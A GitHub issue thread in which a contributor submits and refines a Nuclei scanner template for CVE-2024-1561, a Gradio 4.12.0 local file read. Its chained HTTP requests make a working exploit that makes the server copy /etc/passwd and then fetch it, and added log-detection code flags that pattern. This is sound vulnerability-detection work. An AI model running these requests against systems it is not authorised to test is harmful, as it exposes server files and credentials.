[nuclei-template] CVE-2024-1561 #9771

Closed
DiabloHTB opened this issue May 12, 2024 · 5 comments · Fixed by #9800
@DiabloHTB

Template Information:

Local file read by calling arbitrary methods of the Components class in Gradio 4.12.0. The template I created detects this by trying to get /etc/passwd and matching the word root, using three requests:

  • GET /config and extracting the id of the first component
  • POST /component_server, using the previously extracted id to get the temporary path of /etc/passwd. The response is in double quotes; a regex extracts the hash inside it for use in the next request.
    NOTE: This step can be improved by extracting the whole path without the double quotes using regex; I couldn't find a way to do this.
  • GET tmpath to get /etc/passwd using the already extracted hash, for example "/tmp/gradio/{{tmpath}}passwd", and match the word "root:[x*]:0:0:"

Gradio: https://github.com/gradio-app/gradio
Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
Sh PoC was created by me: https://github.com/DiabloHTB/CVE-2024-1561

Nuclei Template:

```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH

  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server

  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561

  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561

  metadata:
    max-request: 3  # the template sends three requests (config, component_server, file)
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}

    extractors:
      # the response body quotes the cached copy's path; this captures only "/<hash>/",
      # so the next request has to assume the default /tmp/gradio cache directory
      - type: regex
        name: tmpath
        regex:
          - "/(?P<hash>[a-fA-F0-9]+)/"
        internal: true

  - raw:
      - |
        GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```

Example output:

```text
[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
```
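As an added example (not part of the thread or the template), a defender-side heuristic over constructed access-log lines: it flags a client that POSTs to /component_server and, within a short window, fetches a sensitive-looking file name through /file=, which is the trace the three requests above leave in a Gradio server's logs. The log format, the SENSITIVE name list and the 60-second window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (combined log format); addresses are documentation
# ranges and the hash is the one from the example output above. Not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2024:10:00:01 +0000] "GET /config HTTP/1.1" 200 5120
203.0.113.5 - - [12/May/2024:10:00:02 +0000] "POST /component_server HTTP/1.1" 200 64
203.0.113.5 - - [12/May/2024:10:00:03 +0000] "GET /file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd HTTP/1.1" 200 1893
198.51.100.7 - - [12/May/2024:10:05:00 +0000] "GET /config HTTP/1.1" 200 5120
198.51.100.7 - - [12/May/2024:10:05:09 +0000] "GET /file=/tmp/gradio/0af1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9/image.png HTTP/1.1" 200 40211
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Assumed list of basenames that should never be served out of Gradio's temp cache.
SENSITIVE = re.compile(r"/(passwd|shadow|hosts|id_rsa|\.env|environ)$")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    return entry


def find_suspicious_chains(log_text, window_s=60):
    """Return (ip, served_path) pairs where a POST /component_server was followed, within
    window_s seconds and from the same client, by a successful /file= read of a sensitive name."""
    last_post = {}   # ip -> timestamp of its most recent POST /component_server
    hits = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        if e["method"] == "POST" and e["path"] == "/component_server":
            last_post[e["ip"]] = e["ts"]
        elif e["method"] == "GET" and e["path"].startswith("/file="):
            served = e["path"][len("/file="):]
            t = last_post.get(e["ip"])
            if (t is not None and (e["ts"] - t).total_seconds() <= window_s
                    and e["status"] == "200" and SENSITIVE.search(served)):
                hits.append((e["ip"], served))
    return hits
```

Legitimate Gradio clients also hit /file=, so the POST-then-sensitive-name sequence, not /file= alone, is what the rule keys on.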
@DiabloHTB DiabloHTB added the nuclei-template Nuclei template contribution label May 12, 2024
@DiabloHTB
Author

Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label May 14, 2024
@DhiyaneshGeek DhiyaneshGeek linked a pull request May 14, 2024 that will close this issue
@DiabloHTB
Author

@DhiyaneshGeek I have an improvement to this for the regex part before this gets added:

  • I found a way to extract the full path between the "" and to use that as the variable instead of just the hash, making this applicable even if they don't have the gradio folder: /tmp/anything/hash/passwd instead of just /tmp/gradio/hash/passwd

```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH

  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server

  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561

  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561

  metadata:
    max-request: 3  # the template sends three requests (config, component_server, file)
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}

    extractors:
      # grabs the whole quoted path, so a non-default cache directory still works;
      # the character class has no '-', '_' or '.', so a path containing them would be cut short
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```

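An added check, not from the thread, that runs the two tmpath extractors against constructed response bodies so the difference between the hash-only and full-path versions, and the character-class limit of the updated one, is visible; the QUOTED_PATH pattern is an assumed alternative, not something the template uses.

```python
import re

# Constructed sample response bodies for the POST /component_server step (a JSON-encoded
# string holding the cached file path). The hash is the one from the example output in
# this thread; the directory names are made up for illustration.
RESPONSE_DEFAULT_DIR = '"/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd"'
RESPONSE_CUSTOM_DIR = '"/var/cache/my-app_tmp/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd"'

# The two extractors from this thread. Python's re accepts both patterns unchanged
# (the (?P<name>...) named group and the escaped slash are valid in Go's regexp too).
HASH_ONLY = re.compile(r"/(?P<hash>[a-fA-F0-9]+)/")   # first template: yields "/<hash>/"
FULL_PATH = re.compile(r"\/[a-zA-Z0-9\/]+")           # updated template: yields the path
# Assumed alternative (not in the thread): everything between the quotes, so '-', '_'
# and '.' in a custom cache directory do not truncate the match.
QUOTED_PATH = re.compile(r'"(/[^"]+)"')


def extract(pattern, body, group=0):
    """Return what the extractor would capture from a response body, or None on no match."""
    m = pattern.search(body)
    return m.group(group) if m else None


def compare_extractors(body):
    """Run all three patterns over one body; keys name the pattern, values the capture."""
    return {
        "hash_only": extract(HASH_ONLY, body),
        "full_path": extract(FULL_PATH, body),
        "quoted_path": extract(QUOTED_PATH, body, 1),
    }
```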
@DhiyaneshGeek
Member

Hi @DiabloHTB

Only this part below was updated, right?

```yaml
    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true
```

@DiabloHTB
Author

DiabloHTB commented May 14, 2024

@DhiyaneshGeek Hey there, that part and the last request changed from `GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1` to `GET /file={{tmpath}} HTTP/1.1` since I now have the full path, not just the hash. Below is the full signed template; let me know if I need to add something, this is my first template.

```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH

  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server

  remediation: |
    Update to Gradio 4.13.0

  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561

  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561

  metadata:
    max-request: 3  # the template sends three requests (config, component_server, file)
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}

    extractors:
      # grabs the whole quoted path, so a non-default cache directory still works;
      # the character class has no '-', '_' or '.', so a path containing them would be cut short
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c
```

@DhiyaneshGeek
Member

Hi @DiabloHTB, I'll update the PR #9800 from my side.

You can grab your cool PD stickers over here http://nux.gg/stickers 😄

Thanks for sharing the updated template.
